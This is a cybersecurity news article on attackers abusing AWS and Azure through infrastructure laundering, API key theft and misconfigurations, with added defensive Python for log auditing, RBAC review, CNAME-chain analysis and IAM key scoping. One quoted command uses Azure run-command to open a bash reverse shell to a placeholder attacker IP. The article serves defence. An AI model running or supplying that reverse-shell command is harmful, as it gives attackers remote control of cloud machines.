Cyber Security News

Hackers Abusing AWS & Microsoft Azure To Launch Large-Scale Cyber Attacks

Hackers are increasingly leveraging cloud platforms like Amazon Web Services (AWS) and Microsoft Azure to orchestrate large-scale cyber attacks.

These platforms, which host critical infrastructure for businesses worldwide, are being exploited through sophisticated methods, including fraudulent account setups, API key theft, and infrastructure laundering.

How the abuse works:

  1. Infrastructure Laundering: A notable tactic is “infrastructure laundering,” where threat actors use stolen or fraudulent accounts to rent IP addresses from AWS and Azure. For instance, the FUNNULL Content Delivery Network (CDN) has rented over 1,200 IPs from AWS and nearly 200 from Azure. Malicious domains are then pointed at those IPs through chains of CNAME records, so the hostnames used for phishing campaigns, investment scams, and money laundering operations resolve to reputable cloud address space and borrow its reputation.
  2. API Key Theft: Hackers have also targeted API keys in both AWS and Azure environments. In one case, Microsoft identified systematic API key theft from multiple customers; the stolen keys were used to bypass safety controls and generate harmful content via Azure OpenAI services. The attackers routed requests through reverse proxy services so that the traffic looked like legitimate API calls made with the victims' keys.
  3. Cloud Misconfigurations: Misconfigured cloud resources remain a significant source of exposure. Attackers exploit publicly accessible S3 buckets in AWS or overly permissive storage and access policies in Azure to reach sensitive data. Tools like AWSBucketDump automate the discovery of such exposures.
  4. Abuse of Management Features: Attackers who already hold control-plane credentials use Azure's RunShellScript run-command to execute arbitrary code on virtual machines (VMs), or use publicly shared AWS AMIs (Amazon Machine Images), which can carry leftover credentials and metadata from their publisher. For example:
   az vm run-command invoke -g <GROUP-NAME> -n <VM-NAME> --command-id RunShellScript --scripts "bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/9090 0>&1'"

Silent Push researchers demonstrated that this single command opens a reverse shell on a Linux VM hosted on Azure. This is not an Azure vulnerability: run-command is a supported management feature, and the call succeeds only for an identity that already holds the Microsoft.Compute/virtualMachines/runCommand/action permission on the VM (included in Owner, Contributor and Virtual Machine Contributor, among other roles). Every invocation is recorded in the subscription's Activity Log, which is where defenders should look for it.
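Two checks a defender wants around the run-command abuse described above, as an added example that is not code from the article or from Silent Push: a pass over Activity Log records that reports each completed run-command invocation and flags callers outside an expected set, and an audit of RBAC role definitions for the runCommand action. Field names follow the Azure Activity Log and role-definition JSON schemas; every log record, caller, role and VM name below is constructed for the demo, and the role definitions only approximate Azure's built-in ones.

```python
"""Added example (not from the article or from Silent Push): two checks a
defender wants around `az vm run-command invoke`. Field names follow the
Azure Activity Log schema and Azure RBAC role-definition JSON; every record
and role below is constructed for illustration."""
import fnmatch
import json

# The control-plane action that run-command needs on the target VM.
RUN_COMMAND_ACTION = "Microsoft.Compute/virtualMachines/runCommand/action"

# Constructed Activity Log entries, one JSON object per line. A real export
# emits a Started and a Succeeded/Failed event for each invocation.
SAMPLE_ACTIVITY_LOG = """\
{"eventTimestamp": "2025-03-20T09:12:44Z", "caller": "ops@example.com", "operationName": {"value": "Microsoft.Compute/virtualMachines/start/action"}, "status": {"value": "Succeeded"}, "resourceId": "/subscriptions/s1/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/web01"}
{"eventTimestamp": "2025-03-20T09:15:02Z", "caller": "svc-deploy@example.com", "operationName": {"value": "Microsoft.Compute/virtualMachines/runCommand/action"}, "status": {"value": "Started"}, "resourceId": "/subscriptions/s1/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/web01"}
{"eventTimestamp": "2025-03-20T09:15:09Z", "caller": "svc-deploy@example.com", "operationName": {"value": "Microsoft.Compute/virtualMachines/runCommand/action"}, "status": {"value": "Succeeded"}, "resourceId": "/subscriptions/s1/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/web01"}
{"eventTimestamp": "2025-03-20T23:41:10Z", "caller": "contractor@example.net", "operationName": {"value": "Microsoft.Compute/virtualMachines/runCommand/action"}, "status": {"value": "Succeeded"}, "resourceId": "/subscriptions/s1/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/db01"}
"""

# Identities expected to run scripts on VMs (an assumption for the demo).
EXPECTED_RUN_COMMAND_CALLERS = {"svc-deploy@example.com"}


def find_run_command_events(log_text, expected_callers=EXPECTED_RUN_COMMAND_CALLERS):
    """Return one dict per completed run-command invocation, flagging callers
    outside the expected set. Started events are skipped so each invocation
    is reported once."""
    hits = []
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev["operationName"]["value"].lower() != RUN_COMMAND_ACTION.lower():
            continue
        if ev["status"]["value"] != "Succeeded":
            continue
        hits.append({
            "time": ev["eventTimestamp"],
            "caller": ev["caller"],
            "vm": ev["resourceId"].rsplit("/", 1)[-1],
            "unexpected": ev["caller"] not in expected_callers,
        })
    return hits


def role_grants_run_command(role):
    """Azure RBAC grants an action when some Actions pattern matches it and no
    NotActions pattern does. Azure's '*' spans '/' segments, as fnmatch's does;
    action names are case-insensitive, so both sides are lowercased."""
    target = RUN_COMMAND_ACTION.lower()

    def any_match(patterns):
        return any(fnmatch.fnmatchcase(target, p.lower()) for p in patterns)

    return any(any_match(p.get("actions", [])) and not any_match(p.get("notActions", []))
               for p in role["permissions"])


def roles_granting_run_command(roles):
    """Names of the roles whose holders could invoke run-command on a VM."""
    return [r["roleName"] for r in roles if role_grants_run_command(r)]


# Constructed role definitions approximating built-in and custom roles.
SAMPLE_ROLES = [
    {"roleName": "Reader", "permissions": [{"actions": ["*/read"], "notActions": []}]},
    {"roleName": "Virtual Machine Contributor",
     "permissions": [{"actions": ["Microsoft.Compute/*"], "notActions": []}]},
    {"roleName": "VM Operator (no scripts)",
     "permissions": [{"actions": ["Microsoft.Compute/virtualMachines/*"],
                      "notActions": [RUN_COMMAND_ACTION]}]},
    {"roleName": "Owner", "permissions": [{"actions": ["*"], "notActions": []}]},
]

if __name__ == "__main__":
    for hit in find_run_command_events(SAMPLE_ACTIVITY_LOG):
        print(("ALERT " if hit["unexpected"] else "ok    ") + json.dumps(hit))
    print("roles able to run scripts on VMs:", roles_granting_run_command(SAMPLE_ROLES))
```

The "VM Operator (no scripts)" role shows the least-privilege shape: a custom role can keep day-to-day VM management while listing the runCommand action under NotActions, so a stolen operator credential cannot turn into a shell on the box.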

Infrastructure laundering process (Source – Silent Push)

Impact of the Attacks

FUNNULL’s infrastructure is linked to phishing campaigns involving over 200,000 malicious hostnames generated via Domain Generation Algorithms, targeting major brands like Microsoft and Google.

Node map showing the main entities involved in providing underlying host services to FUNNULL CDN (Source – Silent Push)

In addition, attackers use compromised environments to exfiltrate sensitive data before erasing it and demanding ransom payments, a tactic seen in recent AWS-focused extortion campaigns reported to have targeted over 230 million cloud environments.

Moreover, FUNNULL has engaged in supply chain attacks, notably hijacking a popular JavaScript library to infect over 110,000 websites.

Map of FUNNULL CNAME Chains (Source – Silent Push)
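The CNAME chains in the map above are the detectable signature of infrastructure laundering: the hostname a victim sees never carries an A record of its own, and only after several CNAME hops does it land on an address rented from a cloud provider. The following added example (not code from the article or from Silent Push) walks such chains over constructed DNS data and flags hostnames whose terminal addresses fall in provider ranges. The zone data, hostnames and CIDRs are all invented for the demo; in practice the ranges would be loaded from AWS's published ip-ranges.json and the Azure Service Tags download, and the records would come from a resolver or passive-DNS source.

```python
"""Added example (not from the article or from Silent Push): walk CNAME chains
from constructed DNS data and flag hostnames whose terminal A records land in
cloud-provider address space. Zone data and CIDRs are invented; real ranges
come from AWS ip-ranges.json and the Azure Service Tags file."""
import ipaddress

# Constructed provider ranges (assumption; not the real published lists).
CLOUD_RANGES = {
    "aws": [ipaddress.ip_network("203.0.113.0/24")],
    "azure": [ipaddress.ip_network("198.51.100.0/24")],
}

# Constructed records: name -> list of (type, value). Trailing dots omitted.
ZONE = {
    "login-secure.example-bank.test": [("CNAME", "edge.cdn-front.test")],
    "edge.cdn-front.test": [("CNAME", "pool7.cdn-front.test")],
    "pool7.cdn-front.test": [("A", "203.0.113.17"), ("A", "203.0.113.18")],
    "invest-now.scam.test": [("CNAME", "x1.cdn-front.test")],
    "x1.cdn-front.test": [("A", "198.51.100.40")],
    "loop-a.test": [("CNAME", "loop-b.test")],
    "loop-b.test": [("CNAME", "loop-a.test")],
    "www.legit.test": [("A", "192.0.2.10")],
}

MAX_HOPS = 8  # resolvers give up on long chains; so do we


def walk_cname_chain(name, zone=ZONE):
    """Return (chain, ips): every hostname visited, then the terminal A records.
    Raises ValueError on a CNAME loop or a chain longer than MAX_HOPS."""
    chain, seen = [name], {name}
    while True:
        records = zone.get(chain[-1], [])
        cnames = [v for t, v in records if t == "CNAME"]
        if not cnames:
            return chain, [v for t, v in records if t == "A"]
        nxt = cnames[0]  # a name with a CNAME carries no other data (RFC 1034)
        if nxt in seen:
            raise ValueError(f"CNAME loop at {nxt}: {' -> '.join(chain)}")
        if len(chain) >= MAX_HOPS:
            raise ValueError(f"CNAME chain from {name} exceeds {MAX_HOPS} hops")
        chain.append(nxt)
        seen.add(nxt)


def provider_for(ip):
    """Which constructed provider range, if any, contains this address."""
    addr = ipaddress.ip_address(ip)
    for provider, nets in CLOUD_RANGES.items():
        if any(addr in n for n in nets):
            return provider
    return None


def classify(name, zone=ZONE):
    chain, ips = walk_cname_chain(name, zone)
    providers = {provider_for(ip) for ip in ips} - {None}
    return {"name": name, "hops": len(chain) - 1, "terminal": chain[-1],
            "ips": ips, "providers": sorted(providers)}


def flag_cloud_fronted(names, zone=ZONE):
    """Hostnames that reach cloud address space only through one or more CNAME
    hops match the laundering pattern; loops are reported, not fatal."""
    flagged, broken = [], []
    for n in names:
        try:
            info = classify(n, zone)
        except ValueError as exc:
            broken.append((n, str(exc)))
            continue
        if info["hops"] >= 1 and info["providers"]:
            flagged.append(info)
    return flagged, broken


if __name__ == "__main__":
    flagged, broken = flag_cloud_fronted(
        ["login-secure.example-bank.test", "invest-now.scam.test",
         "www.legit.test", "loop-a.test"])
    for f in flagged:
        print(f"{f['name']}: {f['hops']} hops -> {f['terminal']} {f['ips']} {f['providers']}")
    for n, why in broken:
        print(f"{n}: {why}")
```

A hostname that lands in AWS or Azure space is not malicious by itself, since most of the internet's legitimate sites do too; the useful signal is the combination of a brand-like hostname, a multi-hop chain through a third-party CDN name, and a terminal pool shared with many unrelated domains, which is what the FUNNULL map above shows.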

To counter these threats, organizations must adopt robust cloud security measures. This includes enabling the providers' own threat detection, Amazon GuardDuty on AWS or Microsoft Defender for Cloud on Azure, to surface suspicious activity in near real time.

Additionally, API security can be strengthened by rotating API keys regularly and scoping each key with source-IP and time-window conditions, so that a stolen key is useless from an attacker's infrastructure or after its validity period ends.

Regular configuration audits of cloud resources help identify misconfigurations, and implementing a Zero Trust Architecture with multi-factor authentication (MFA) and least privilege access policies further safeguards the environment.
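The key-scoping and MFA advice in the two paragraphs above is concrete enough to write down. The following added example (not from the article) is an IAM identity policy that restricts an access key to an office IP range and a project window and denies everything without MFA, together with a small evaluator that shows which requests it admits. The condition keys (aws:SourceIp, aws:CurrentTime, aws:MultiFactorAuthPresent) and operators are real IAM ones; the evaluator is a deliberate simplification of IAM's logic (an explicit Deny wins, otherwise a matching Allow, otherwise implicit deny) that supports only the operators used here. The bucket name, IP addresses and dates are constructed.

```python
"""Added example (not from the article): an IAM identity policy that scopes an
access key to a source-IP range, a validity window and MFA, plus a small
evaluator showing which requests it admits. Condition keys and operators are
real IAM ones; the evaluator is a simplification (explicit Deny wins, then a
matching Allow, else implicit deny) covering only the operators used here.
Bucket name, IPs and dates are constructed."""
import copy
import fnmatch
import ipaddress
from datetime import datetime

KEY_SCOPING_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowReportReadsFromOfficeDuringProject",
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": ["arn:aws:s3:::example-reports", "arn:aws:s3:::example-reports/*"],
            "Condition": {
                "IpAddress": {"aws:SourceIp": ["203.0.113.0/24"]},
                "DateGreaterThan": {"aws:CurrentTime": "2025-03-01T00:00:00Z"},
                "DateLessThan": {"aws:CurrentTime": "2025-04-01T00:00:00Z"},
            },
        },
        {
            "Sid": "DenyEverythingWithoutMFA",
            "Effect": "Deny",
            "Action": "*",
            "Resource": "*",
            # BoolIfExists, not Bool: a long-term access key never carries the
            # MFA context key at all, and plain Bool would let it through.
            "Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": "false"}},
        },
    ],
}


def _as_list(x):
    return x if isinstance(x, list) else [x]


def _parse_time(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def _condition_matches(op, key, expected, ctx):
    """Evaluate one IAM condition. Operators ending in IfExists treat a missing
    context key as a match; plain operators treat it as a mismatch."""
    if_exists = op.endswith("IfExists")
    base = op[: -len("IfExists")] if if_exists else op
    values = _as_list(expected)
    if key not in ctx:
        return if_exists
    actual = ctx[key]
    if base == "IpAddress":
        return any(ipaddress.ip_address(actual) in ipaddress.ip_network(v) for v in values)
    if base == "NotIpAddress":
        return not any(ipaddress.ip_address(actual) in ipaddress.ip_network(v) for v in values)
    if base == "DateGreaterThan":
        return _parse_time(actual) > _parse_time(values[0])
    if base == "DateLessThan":
        return _parse_time(actual) < _parse_time(values[0])
    if base == "Bool":
        return str(actual).lower() == str(values[0]).lower()
    raise NotImplementedError(op)


def _statement_applies(stmt, action, resource, ctx):
    if not any(fnmatch.fnmatchcase(action, p) for p in _as_list(stmt["Action"])):
        return False
    if not any(fnmatch.fnmatchcase(resource, p) for p in _as_list(stmt["Resource"])):
        return False
    return all(_condition_matches(op, key, expected, ctx)
               for op, kv in stmt.get("Condition", {}).items()
               for key, expected in kv.items())


def is_allowed(policy, action, resource, ctx):
    """Simplified IAM decision: any applicable Deny wins, else any Allow."""
    allowed = False
    for stmt in policy["Statement"]:
        if _statement_applies(stmt, action, resource, ctx):
            if stmt["Effect"] == "Deny":
                return False
            allowed = True
    return allowed


def policy_with_plain_bool(policy):
    """Same policy with BoolIfExists weakened to Bool, to show the pitfall."""
    p = copy.deepcopy(policy)
    for stmt in p["Statement"]:
        cond = stmt.get("Condition", {})
        if "BoolIfExists" in cond:
            cond["Bool"] = cond.pop("BoolIfExists")
    return p


# Constructed request contexts. aws:MultiFactorAuthPresent is absent for a
# plain long-term access key; it is only set on session credentials.
OFFICE_MFA = {"aws:SourceIp": "203.0.113.25", "aws:CurrentTime": "2025-03-15T10:00:00Z",
              "aws:MultiFactorAuthPresent": "true"}
STOLEN_KEY_ELSEWHERE = {**OFFICE_MFA, "aws:SourceIp": "198.51.100.7"}
AFTER_WINDOW = {**OFFICE_MFA, "aws:CurrentTime": "2025-04-02T08:00:00Z"}
LONG_TERM_KEY_NO_MFA = {"aws:SourceIp": "203.0.113.25", "aws:CurrentTime": "2025-03-15T10:00:00Z"}

ACTION, RESOURCE = "s3:GetObject", "arn:aws:s3:::example-reports/q1.pdf"

if __name__ == "__main__":
    for label, ctx in [("office + MFA", OFFICE_MFA), ("stolen key, other IP", STOLEN_KEY_ELSEWHERE),
                       ("after window", AFTER_WINDOW), ("long-term key, no MFA", LONG_TERM_KEY_NO_MFA)]:
        verdict = "ALLOW" if is_allowed(KEY_SCOPING_POLICY, ACTION, RESOURCE, ctx) else "DENY"
        print(f"{label:24s} -> {verdict}")
    weak = policy_with_plain_bool(KEY_SCOPING_POLICY)
    print("with Bool instead of BoolIfExists, no-MFA key ->",
          is_allowed(weak, ACTION, RESOURCE, LONG_TERM_KEY_NO_MFA))
```

The time window does not replace rotation: it bounds the damage of a key stolen late in the project, while rotation bounds the damage of one stolen early. The Bool versus BoolIfExists distinction is the caveat worth remembering, because an MFA-enforcing Deny written with plain Bool silently exempts exactly the long-term keys that API key theft targets.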

Both AWS and Microsoft have acknowledged the challenges posed by these attacks. By addressing these vulnerabilities head-on, businesses can fortify their defenses against the misuse of cloud platforms for cybercrime.


Tushar Subhra Dutta